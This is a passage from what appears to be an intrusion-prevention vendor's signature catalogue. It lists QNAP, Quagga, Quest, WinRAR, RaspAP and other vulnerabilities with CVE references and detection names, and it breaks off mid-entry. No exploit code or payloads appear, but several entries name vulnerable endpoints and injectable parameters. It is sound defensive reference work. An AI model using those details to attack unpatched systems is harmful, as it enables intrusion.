Situation: HTTP_CRL-QNAP-Hbs-3-Hybrid-Backup-Sync-Command-Injection
Generic_CS-QNAP-Hbs-3-Hybrid-Backup-Sync-Command-Injection
References:
CVE-2024-50388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50388
Back to top

QNAP-Multiple-Products-Hls_Tmp-Directory-Traversal

About this vulnerability: A vulnerability in QNAP QTS
Risk: Moderate
First detected in: sgpkg-ips-1737-5242
Last changed: sgpkg-ips-1737-5242
Platform: Generic
Software: QNAP QTS
Type: Directory Traversal
Description: Improper validation of user data sent through the HLS_Tmp parameter causes a directory traversal vulnerability in QNAP QTS. A successful exploitation allows an attacker to read and write files on the target system, potentially causing a denial of service condition.
Situation: HTTP_CRL-QNAP-Multiple-Products-Hls_Tmp-Directory-Traversal
References:
CVE-2023-51365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51365
Back to top

QNAP-Multiple-Products-Log-Upload-Command-Injection

About this vulnerability: A vulnerability in QNAP QTS
Risk: Moderate
First detected in: sgpkg-ips-1776-5242
Last changed: sgpkg-ips-1776-5242
Platform: Generic
Software: QNAP QTS
Type: Input Validation
Description: Improper validation of user data sent to the blobRequest.cgi endpoint causes a command injection vulnerability in QNAP products. A successful exploitation allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-QNAP-Multiple-Products-Log-Upload-Command-Injection
References:
CVE-2023-51364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51364
Back to top

QNAP-Multiple-Products-Privwizard-Username-Command-Injection

About this vulnerability: A vulnerability in QNAP myQNAPcloud
Risk: Moderate
First detected in: sgpkg-ips-1770-5242
Last changed: sgpkg-ips-1770-5242
Platform: Generic
Software: QNAP QTS
Type: Input Validation
Description: Improper validation of user data sent through the username parameter sent in to the privWizard.cgi endpoint causes a command injection vulnerability in multiple QNAP products. A successful exploitation allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-QNAP-Multiple-Products-Privwizard-Username-Command-Injection
References:
CVE-2024-32766
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32766
Back to top

QNAP-Photo-Station-Externally-Controlled-Reference-To-A-Resource-CVE-2022-27593

About this vulnerability: A vulnerability in QNAP Photo Station
Risk: High
First detected in: sgpkg-ips-1636-5242
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: QNAP Photo Station
Type: Input Validation
Description: An externally controlled reference to a resource vulnerability has been reported in QNAP NAS Photo Station. Exploiting this vulnerability does not require authentication and allows remote attackers to modify system files.
Situation: HTTP_CRL-QNAP-Photo-Station-Externally-Controlled-Reference-To-A-Resource-CVE-2022-27593
References:
CVE-2022-27593
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27593
Back to top

QNAP-Photo-Station-Path-Traversal-Vulnerability-CVE-2019-7194

About this vulnerability: An attempt to exploit a vulnerability in QNAP Photo Station detected
Risk: High
First detected in: sgpkg-ips-1591-5242
Last changed: sgpkg-ips-1591-5242
Platform: Generic
Software: QNAP Photo Station
Type: Input Validation
Description: This is a path traversal vulnerability in QNAP Photo Station, which allows remote attackers to access or modify system files.
Situation: HTTP_CRL-QNAP-Photo-Station-Path-Traversal-Vulnerability-CVE-2019-7194
References:
CVE-2019-7194
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7194
Back to top

QNAP-Q-Center-Virtual-Appliance-Change_Passwd-Command-Execution

About this vulnerability: A vulnerability in QNAP Q-Center Virtual Appliance
Risk: High
First detected in: sgpkg-ips-1134-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: QNAP Q-Center
Type: Input Validation
Description: A vulnerability in QNAP Q-Center Virtual Appliance, versions prior to 1.7.1083, which allows unauthenticated remote attackers to execute arbitrary commands through the change_passwd API method.
Situation: HTTP_CRL-QNAP-Q-Center-Virtual-Appliance-Change_Passwd-Command-Execution
References:
CVE-2018-0707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0707
Back to top

QNAP-QTS-QuTS-hero-Command-Injection-CVE-2023-47218

About this vulnerability: A vulnerability in QNAP
Risk: High
First detected in: sgpkg-ips-1693-5242
Last changed: sgpkg-ips-1693-5242
Platform: Generic
Software: QNAP QTS
Type: Input Validation
Description: An unauthenticated command injection vulnerability has been reported in QNAP NAS operating systems QTS and QuTS hero. Successfully exploiting this vulnerability could result in remote code execution.
Situation: HTTP_CS-QNAP-QTS-QuTS-hero-Command-Injection-CVE-2023-47218
References:
CVE-2023-47218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47218
Back to top

QNAP-Remote-Code-Execution-CVE-2024-27130

About this vulnerability: A vulnerability in QNAP NAS
Risk: High
First detected in: sgpkg-ips-1730-5242
Last changed: sgpkg-ips-1730-5242
Platform: Generic
Software: QNAP QTS
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been reported in the file sharing functionality of the QNAP NAS devices. A remote, unauthenticated attacker can leverage this vulnerability for remote code execution.
Situation: HTTP_CRL-QNAP-Remote-Code-Execution-CVE-2024-27130
References:
CVE-2024-27130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27130
Back to top

QNAP-Transcode-Server-Command-Execution

About this vulnerability: A QNAP Transcode Server Command Execution vulnerability
Risk: High
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: QNAP Transcode Server
Type: Input Validation
Description: A vulnerability in QNAP Transcode Server, firmware version 4.3.3.0262, which allows remote attackers to execute arbitrary code due to the lack of proper unput validation.
Situation: Generic_CS-QNAP-Transcode-Server-Command-Execution
Back to top

QNAP-Viostor-NVR-Command-Injection-CVE-2023-47565

About this vulnerability: A vulnerability in QNAP VioStor NVR
Risk: High
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Platform: Generic
Software: QNAP VioStor NVR
Type: Input Validation
Description: An OS command injection vulnerability has been reported for the QNAP VioStor network video recorders running QVR firmware versions 4.x.
Situation: HTTP_CRL-QNAP-Viostor-NVR-Command-Injection-CVE-2023-47565
References:
CVE-2023-47565
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47565
Back to top

QNX-Phrelay-DoS

About this vulnerability: A vulnerability in QNX phrelay
Risk: Moderate
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-1296-5242
Platform: QNX
Software: <os>
Type: Input Validation
Description: A vulnerability in QNX phrelay
Situation: Generic_CS-QNX-Phrelay-DoS
Back to top

QNX-QCONN-Denial-Of-Service

About this vulnerability: A vulnerability in QNX Qconn allowing denial of service and remote code execution.
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: QNX
Software: <os>
Type: Malfunction
Description: A vulnerability exists in QNX Qconn where it is possible for an attacker can execute arbitrary commands.
Situation: Generic_CS-QNX-QCONN-Denial-Of-Service-Denial-Of-Service
Back to top

Qognify-Ocularis-Eventcoordinator-Insecure-Deserialization

About this vulnerability: A vulnerability in Qognify Ocularis
Risk: High
First detected in: sgpkg-ips-1316-5242
Last changed: sgpkg-ips-1316-5242
Platform: Generic
Software: Qognify Ocularis
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Qognify Ocularis. The vulnerability is due to insufficient validation of request to EventCoordinator endpoint. A remote, unauthenticated user can exploit this vulnerability by sending malicious request to the target server. Successful exploitation can result in result in arbitrary code execution under the security context of SYSTEM.
Situation: Generic_CS-Qognify-Ocularis-Eventcoordinator-Insecure-Deserialization
References:
CVE-2020-27868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27868
Back to top

Qt-BMP-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Trolltech Qt Library
Risk: Moderate
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trolltech Qt Library
Type: Malfunction
Description: There is a vulnerability in the way the Qt library handles BMP images. Due to boundary check errors during the handling 8-bit RLE encoded BMP files, a heap buffer overflow can occur when opening malformed BMP images. This vulnerability, when successfully exploited, can allow for the execution of arbitrary code on a vulnerable system within the security context of the application embedding the Qt library. The victim's application will crash as a result of a successful attack. In the case of a more sophisticated attack that attempts to take control of the process flow, the behavior of the target depends entirely on the injected code.
Situation: File-Binary_Qt-BMP-Handling-Buffer-Overflow
References:
CVE-2004-0691
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0691
BID-10977
http://www.securityfocus.com/bid/10977
Back to top

Quagga-Aspath_Put-BGP-Session-Drop-Denial-Of-Service

About this vulnerability: A vulnerability in Quagga Quagga
Risk: Moderate
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Quagga
Type: Malfunction
Description: Improper calculations based on client message data cause denial of service vulnerability in Quagga. A successful exploit allows an attacker to cause sessions to be dropped.
Situation: Generic_CS-Quagga-Aspath_Put-BGP-Session-Drop-Denial-Of-Service
References:
CVE-2017-16227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16227
Back to top

Quagga-BGP-Daemon-BGP_Capability_Msg_Parse-Denial-Of-Service

About this vulnerability: A vulnerability in Quagga
Risk: High
First detected in: sgpkg-ips-1129-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Quagga
Type: Infinite Loop
Description: A denial-of-service vulnerability has been reported in the BGP Daemon of Quagga. The vulnerability is due to improper handling of Multiprotocol Extensions Capabilities within certain BGP messages. A remote attacker could exploit this vulnerability by sending a crafted BGP message to the target server. Successful exploitation could result in denial-of-service conditions.
Situation: Generic_TCP-Quagga-BGP-Daemon-BGP_Capability_Msg_Parse-Denial-Of-Service
References:
CVE-2018-5381
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5381
Back to top

Quagga-BGP-Daemon-Notify-Attribute-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Quagga Quagga
Risk: High
First detected in: sgpkg-ips-1129-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Quagga
Type: Input Validation
Description: An out of bounds read vulnerability has been reported in Quagga BGP Daemon. The vulnerability is due to improper validation of attribute sizes received by BGP peers before responding with the contents of the attribute in a NOTIFY message. A remote attacker can exploit this vulnerability by sending a crafted BGP UPDATE message to the target server. Successful exploitation could result in the disclosure of memory contents to the attacker. Unsuccessful exploitation could result in termination of the bgpd process.
Situation: Generic_TCP-Quagga-BGP-Daemon-Notify-Attribute-Out-Of-Bounds-Read
References:
CVE-2018-5378
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5378
Back to top

Quagga-Daemon-BGP_Update_Receive-Double-Free

About this vulnerability: A vulnerability in Quagga Quagga
Risk: Moderate
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Quagga
Type: Input Validation
Description: Improper handling of cluster list and unknown attributes causes a double free vulnerability in Quagga. A successful exploit may allow an attacker to run arbitrary code on the target system with the privileges of the daemon.
Situation: Generic_CS-Quagga-Daemon-BGP_Update_Receive-Double-Free
References:
CVE-2018-5379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5379
Back to top

Quagga-Vty-Interface-Denial-Of-Service

About this vulnerability: A vulnerability in Quagga
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Quagga
Type: Input Validation
Description: The Vty interface in the Quagga daemon has an input validation vulnerability, which can be exploited by sending a long sequence of characters without a newline. A successful exploit can cause a denial of service condition.
Situation: Generic_CS-Quagga-Vty-Interface-Denial-Of-Service
References:
CVE-2017-5495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5495
Back to top

Qualcomm-WorldMail-IMAP-Literal-Counter-Parsing-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the IMAP literal counter parsing in Qualcomm WorldMail
Risk: High
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Qualcomm WorldMail
Type: Buffer Overflow
Description: The Qualcomm WorldMail IMAP server has a buffer overflow vulnerability in the handling of IMAP literal octet counter. The server does not validate the length of the counter value, which is copied into a static size buffer. If the value is long enough, the copy operation will cause a buffer overflow condition. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the vulnerable server.
Situation: IMAP_CS-Qualcomm-WorldMail-IMAP-Literal-Counter-Parsing-Buffer-Overflow
References:
CVE-2005-4267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4267
BID-15980
http://www.securityfocus.com/bid/15980
Back to top

Qualcomm-WorldMail-IMAP-Server-Directory-Traversal

About this vulnerability: A vulnerability in Qualcomm WorldMail
Risk: High
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Qualcomm WorldMail
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in Qualcomm WorldMail IMAP server. The vulnerability is caused by insufficient validation of the user provided data. An authenticated remote attacker can exploit this vulnerability to gain access to other user's mailboxes as well as files and folders on the target system.
Situation: IMAP_Qualcomm-WorldMail-IMAP-Server-Directory-Traversal
References:
CVE-2005-3189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3189
BID-15488
http://www.securityfocus.com/bid/15488
Back to top

Quest-Intrust-Annotation-Objects-ActiveX-Control-Index-Out-Of-Bounds

About this vulnerability: A vulnerability in Quest Software InTrust
Risk: Moderate
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Quest Software InTrust
Type: Malfunction
Description: A memory access vulnerability has been reported in Quest InTrust's Annotation Objects ActiveX control. The vulnerability is due to a design flaw in the Add() method exposed by this ActiveX control, which allows script code to cause the process to execute code from an attacker-controlled memory location. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to access a maliciously crafted web page. This can result in code execution in the context of the affected user.
Situation: File-Text_Quest-Intrust-Annotation-Objects-ActiveX-Control-Index-Out-Of-Bounds
References:
CVE-2012-5896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5896
BID-52765
http://www.securityfocus.com/bid/52765
OSVDB-80662
http://www.osvdb.org/80662
Back to top

Quest-Kace-Systems-Management-Command-Injection

About this vulnerability: A vulnerability in Quest KACE Systems Management
Risk: High
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Quest Software KACE Systems Management
Type: Input Validation
Description: A vulnerability in Quest KACE Systems Management, version 8.0.318, which allows remote attackers to execute arbitrary commands through the download_agent_installer.php script by appending commands to the # symbol.
Situation: HTTP_CSU-Quest-Kace-Systems-Management-Command-Injection
References:
CVE-2018-11138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11138
Back to top

Quest-Kace-Systems-Management-Run_Cross_Report-SQL-Injection

About this vulnerability: A vulnerability in Quest Software KACE Systems Management
Risk: Moderate
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Quest Software KACE Systems Management
Type: Input Validation
Description: There has been reported a SQL injection vulnerability in Quest KACE Systems Management. A remote attacker could exploit this vulnerability by a sending crafted request to the target server. Successful exploitation leads in information disclosure.
Situation: HTTP_CRL-Quest-Kace-Systems-Management-Run_Cross_Report-SQL-Injection
Back to top

Quest-Kace-Systems-Management-Run_Report-Command-Injection

About this vulnerability: A vulnerability in Quest Software KACE Systems Management
Risk: Moderate
First detected in: sgpkg-ips-1106-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Quest Software KACE Systems Management
Type: Input Validation
Description: Improper handling of parameters submitted in requests to the run_report page causes a command injection vulnerability in Quest Software KACE System Management. A successful exploit may allow an attacker to run arbitrary commands with root privileges.
Situation: HTTP_CS-Quest-Kace-Systems-Management-Run_Report-Command-Injection
Back to top

Quest-NetVault-Backup-Export-Arbitrary-File-Overwrite

About this vulnerability: A vulnerability in Quest Software NetVault Backup
Risk: Moderate
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Quest Software NetVault Backup
Type: Input Validation
Description: Insufficient validation of request data causes a file overwrite vulnerability in Quest NetVault. A successful attack may overwrite any file on the target system.
Situation: File-Text_Quest-NetVault-Backup-Export-Arbitrary-File-Overwrite
References:
CVE-2018-1162
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1162
Back to top

Quest-NetVault-Backup-Multipart-Request-Checksession-Authentication-Bypass

About this vulnerability: A vulnerability in Quest Software NetVault Backup
Risk: Moderate
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Quest Software NetVault Backup
Type: Malfunction
Description: There has been reported a vulnerability in the web interface component of Quest NetVault Backup. The value of "checksession" parameter isn't properly handled. This vulnerability can be exploited remotely by sending a maliciously crafted request to the target server. Exploiting this vulnerability might lead to execution of arbitrary code in the target system.
Situation: HTTP_CS-Quest-NetVault-Backup-Multipart-Request-Checksession-Authentication-Bypass
References:
CVE-2018-1163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1163
Back to top

Quest-NetVault-Backup-Multipart-Request-Part-Header-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Quest Software NetVault Backup
Risk: Moderate
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Quest Software NetVault Backup
Type: Buffer Overflow
Description: Improper handling of HTTP multipart requests causes a stack buffer overflow vulnerability in Quest NetVault Backup. A successful exploit may allow an attacker to execute arbitrary code with system privileges without authentication.
Situation: HTTP_CS-Quest-NetVault-Backup-Multipart-Request-Part-Header-Stack-Buffer-Overflow
References:
CVE-2018-1161
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1161
Back to top

Quest-NetVault-Smartdisk-Libnvbasics.dll-Denial-Of-Service

About this vulnerability: A vulnerability in Quest Software NetVault SmartDisk
Risk: Moderate
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Quest Software NetVault SmartDisk
Type: Malfunction
Description: A denial of service vulnerability has been reported in Quest's (formerly BakBone) NetVault SmartDisk backup application. Specifically, an input validation error exists in libnvbasics.dll, which is used by the percolatorslave.exe service listening on TCP port 37452. A remote unauthenticated attacker can exploit this vulnerability to cause a denial of service condition.
Situation: Generic_Quest-NetVault-Smartdisk-Libnvbasics.dll-Denial-Of-Service
Back to top

Quest-Privilege-Manager-pmmasterd-Buffer-Overflow

About this vulnerability: A Quest Privilege Manager pmmasterd Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-1014-5242
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Quest Privilege Manager
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Quest Privilege Manager, versions prior to 6.0.0-50, which allows remote attackers to gain full access to the target server via an ACT_ALERT_EVENT request that causes memory corruption in the pmmasterd daemon.
Situation: Generic_CS-Quest-Privilege-Manager-pmmasterd-Buffer-Overflow
References:
CVE-2017-6553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6553
Back to top

Quic-go-Crypto-Ack-Nil-Pointer-Dereference

About this vulnerability: A vulnerability in quic-go
Risk: Moderate
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1681-5242
Platform: Generic
Software: quic-go
Type: Malfunction
Description: A denial of service vulnerability has been reported for quic-go. The vulnerability is due to a nil pointer dereference. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted packet to the target during the QUIC handshake. Successful exploitation could result in denial of service conditions on the target server.
Situation: Generic_UDP-Quic-go-Crypto-Ack-Nil-Pointer-Dereference
References:
CVE-2023-46239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46239
Back to top

QuickTime-Darwin-Streaming-Server-Buffer-Overflow

About this vulnerability: A vulnerability in Quicktime and Darwin Streaming Server
Risk: High
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: QuickTime Streaming Server; Darwin Streaming Server
Type: Buffer Overflow
Description: A vulnerability exists in the QuickTime Streaming Server and Darwin Streaming Server that allows remote users to cause a denial of service condition on the server. The vulnerability can be exploited to cause the service to either crash or consume all available processor resources.
Situation: Generic_CS-QuickTime-Darwin-Streaming-Server-Buffer-Overflow
References:
CVE-2004-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0169
BID-9735
http://www.securityfocus.com/bid/9735
OSVDB-6837
http://www.osvdb.org/6837
OSVDB-6826
http://www.osvdb.org/6826
Back to top

Quikstore-Shopping-Cart-Disclose-Info

About this vulnerability: QuikStore shopping cart (quikstore.cfg) private information disclosure
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Quikstore Quikstore
Type: Insecure Configuration
Description: An incorrect configuration of the QuikStore shopping cart program 'quikstore.cfg' could disclose private information.
References:
CVE-1999-0607
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0607
BID-1983
http://www.securityfocus.com/bid/1983
Back to top

Raccoon-Stealer-Infection-Traffic

About this vulnerability: Raccoon stealer infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1353-5242
Last changed: sgpkg-ips-1353-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Raccoon stealer infection traffic was detected.
Situation: HTTP_CRL-Raccoon-Stealer-Infection-Traffic
Back to top

Racer-Buffer-Overflow

About this vulnerability: A Racer Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: Racer
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Racer, versions 0.5.3 beta 5, which allows remote attackers to execute arbitrary code via a long string to UDP port 26000.
Situation: Generic_UDP-Racer-Buffer-Overflow
References:
CVE-2007-4370
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4370
BID-25297
http://www.securityfocus.com/bid/25297
OSVDB-39601
http://www.osvdb.org/39601
Back to top

Ralio-Remote-File-Include-Input-Validation

About this vulnerability: A Ralio Remote File Include Input Validation vulnerability.
Risk: High
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ralio
Type: Insecure Configuration
Description: Ralio 4.2.1, and possibly other versions, have a file-include vulnerability which allows remote attackers to execute arbitrary code due to insufficient user input sanitization.
Situation: HTTP_CRL-Ralio-Remote-File-Include-Input-Validation
References:
CVE-2014-5468
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5468
BID-69761
http://www.securityfocus.com/bid/69761
Back to top

Rancher-Server-Docker-Exploit

About this vulnerability: A Rancher Server Docker Exploit vulnerability
Risk: High
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Rancher Server
Type: Insecure Configuration
Description: A vulnerability in Rancher Server which allows remote attackers to create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container, allowing the attacker to edit/create files owed by root.
Situation: HTTP_CRL-Rancher-Server-Docker-Exploit
Back to top

Rank-Math-Wordpress-SEO-Plugin-Updatemeta-Rest-Endpoint-Access-Control-Weakness

About this vulnerability: A vulnerability in Rank Math Wordpress SEO Plugin
Risk: Moderate
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress
Type: Malfunction
Description: The lack of authorization verification on the updateMeta REST endpoint of the SEO Plugin by Rank Math causes an access control weakness vulnerability in Wordpress instances that use it. A successful exploit allows an attacker to modify user metadata and possibly gain access for further exploitation.
Situation: HTTP_CS-Rank-Math-Wordpress-SEO-Plugin-Updatemeta-Rest-Endpoint-Access-Control-Weakness
Back to top

RapidShare-File-Sharing-Service

About this vulnerability: RapidShare-File-Sharing-Service
Risk: Low
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Rapidshare
Type: Browser
Description: Rapidshare is an online file sharing service.
Situation: HTTP_CSH-RapidShare-Access
Back to top

Raptor-Train-Malware-Activity

About this vulnerability: An attempt to exploit a vulnerability in Raptor Train detected
Risk: High
First detected in: sgpkg-ips-1780-5242
Last changed: sgpkg-ips-1780-5242
Platform: Generic
Software: Raptor Train Malware
Type: Backdoor
Description: Raptor Train is a botnet that has infected thousands of networking devices (routers and modems, NVRs and DVRs, IP cameras, and network-attached storage servers) in the U.S. and other countries. This fingerprint detects the malware's activities.
Situation: HTTP_CSU-Raptor-Train-Malware-Activity
Back to top

RARLAB-UnRAR-Extractunixlink50-Directory-Traversal

About this vulnerability: A vulnerability in RARLAB UnRAR
Risk: Moderate
First detected in: sgpkg-ips-1484-5242
Last changed: sgpkg-ips-1484-5242
Platform: Generic
Software: UnRAR
Type: Directory Traversal
Description: A directory traversal vulnerability exists in UnRAR. The vulnerability is due to improper handling of relative file paths when extracting RAR archives containing symbolic links. A remote attacker could exploit this vulnerability by enticing a target user to extract a maliciously crafted RAR file. Successful exploitation will lead to a file being created outside of the expected location, in the worst case leading to arbitrary code execution.
Situation: File-Binary_RARLAB-UnRAR-Extractunixlink50-Directory-Traversal
References:
CVE-2022-30333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30333
Back to top

RARLAB-WinRAR-ACE-Directory-Traversal

About this vulnerability: A vulnerability in RARLAB WinRAR
Risk: Moderate
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RARLAB WinRAR
Type: Malfunction
Description: Improper validation of a filename in an ACE archive file causes a directory traversal vulnerability in WinRAR. A successful exploit may allow an attacker to crate arbitrary directories on the target system.
Situation: File-Binary_RARLAB-WinRAR-ACE-Directory-Traversal
References:
CVE-2018-20251
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20251
Back to top

RARLAB-WinRAR-ACE-Remote-Code-Execution

About this vulnerability: A vulnerability in RARLAB WinRAR
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RARLAB WinRAR
Type: Directory Traversal
Description: A remote code execution vulnerability has been reported in the RARLAB WinRAR. The vulnerability is due to improper handling of the relative path of a file in an ACE archive, which leads to directory traversal. A remote attacker could exploit this vulnerability by enticing a target user to open a maliciously crafted ACE file. Successful exploitation of the vulnerability could lead to execution of arbitrary code in the security context of the user.
Situation: File-Binary_RARLAB-WinRAR-ACE-Remote-Code-Execution
References:
CVE-2018-20250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20250
Back to top

RARLAB-WinRAR-File-Extension-Spoofing-Vulnerability

About this vulnerability: A vulnerability in RARLAB WinRAR
Risk: High
First detected in: sgpkg-ips-1634-5242
Last changed: sgpkg-ips-1634-5242
Platform: Generic
Software: RARLAB WinRAR
Type: Malfunction
Description: A file extension spoofing vulnerability has been reported in RARLAB WinRAR. This vulnerability is due to a design weakness when handling data compressed in ZIP files. A remote attacker could exploit this vulnerability by enticing a victim to open a crafted file. Successfully exploiting this vulnerability could result in remote code execution.
Situation: File-Member-Name_RARLAB-WinRAR-File-Extension-Spoofing-Vulnerability
References:
CVE-2023-38831
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38831
Back to top

RARLAB-WinRAR-Recovery-Volume-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in RARLAB WinRAR
Risk: High
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Platform: Generic
Software: RARLAB WinRAR
Type: Malfunction
Description: A remote code execution vulnerability has been reported in RARLAB WinRAR. This vulnerability is due to an out-of-bounds write when handling recovery volumes. A remote attacker could exploit this vulnerability by enticing a victim to open a crafted file. Successfully exploiting this vulnerability could result in remote code execution.
Situation: File-Binary_RARLAB-WinRAR-Recovery-Volume-Out-Of-Bounds-Write
References:
CVE-2023-40477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40477
Back to top

RARLAB-WinRAR-Zip-File-Out-of-Bounds-Read

About this vulnerability: A vulnerability in RARLAB WinRAR
Risk: Moderate
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Platform: Generic
Software: RARLAB WinRAR
Type: Malfunction
Description: A out-of-bounds read vulnerability has been reported in the RARLAB WinRAR. The vulnerability is due to improper handling of ZIP files. A remote attacker could exploit this vulnerability by enticing a target user to open a maliciously crafted ZIP file. Successful exploitation of the vulnerability could lead to information disclosure in the security context of the user.
Situation: File-Zip_RARLAB-WinRAR-Zip-File-Out-of-Bounds-Read
References:
CVE-2022-43650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43650
Back to top

RaspAP-Unauthenticated-Command-Injection

About this vulnerability: An attempt to exploit a vulnerability in RaspAP detected
Risk: High
First detected in: sgpkg-ips-1669-5242
Last changed: sgpkg-ips-1669-5242
Platform: Unix;Linux
Software: RaspAP
Type: Input Validation
Description: A vulnerability in RaspAP wireless router software, versions 2.8.0 through 2.8.7, which allows remote attackers to execute arbitrary code through the cfg_id parameter in a request to /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
Situation: HTTP_CRL-RaspAP-Unauthenticated-Command-Injection
References:
CVE-2022-39986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39986
Back to top

RaspberryMatic-Unauthenticated-RCE-Vulnerability-Through-HMServer-File-Upload

About this vulnerability: A vulnerability in RaspberryMatic
Risk: High
First detected in: sgpkg-ips-1844-5242
Last changed: sgpkg-ips-1844-5242
Platform: Unix; Linux
Software: RaspberryMatic
Type: Directory Traversal
